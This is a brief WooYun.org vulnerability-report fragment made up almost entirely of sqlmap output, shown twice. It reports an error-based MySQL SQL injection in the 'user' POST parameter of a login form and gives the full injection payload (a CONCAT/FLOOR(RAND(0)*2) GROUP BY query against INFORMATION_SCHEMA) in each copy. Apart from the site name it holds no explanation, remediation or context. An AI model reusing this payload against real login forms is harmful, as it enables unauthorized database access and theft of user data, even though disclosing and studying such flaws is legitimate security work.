WooYun.org

sqlmap identified the following injection points with a total of 62 HTTP(s) requests:
---
Place: POST
Parameter: user
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: user=A' AND (SELECT 1917 FROM(SELECT COUNT(*),CONCAT(0x3a68726e3a,(SELECT (CASE WHEN (1917=1917) THEN 1 ELSE 0 END)),0x3a7461763a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'bwuX'='bwuX&upass=A&button=++%E7%99%BB%E5%BD%95++
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: user
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: user=A' AND (SELECT 1917 FROM(SELECT COUNT(*),CONCAT(0x3a68726e3a,(SELECT (CASE WHEN (1917=1917) THEN 1 ELSE 0 END)),0x3a7461763a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'bwuX'='bwuX&upass=A&button=++%E7%99%BB%E5%BD%95++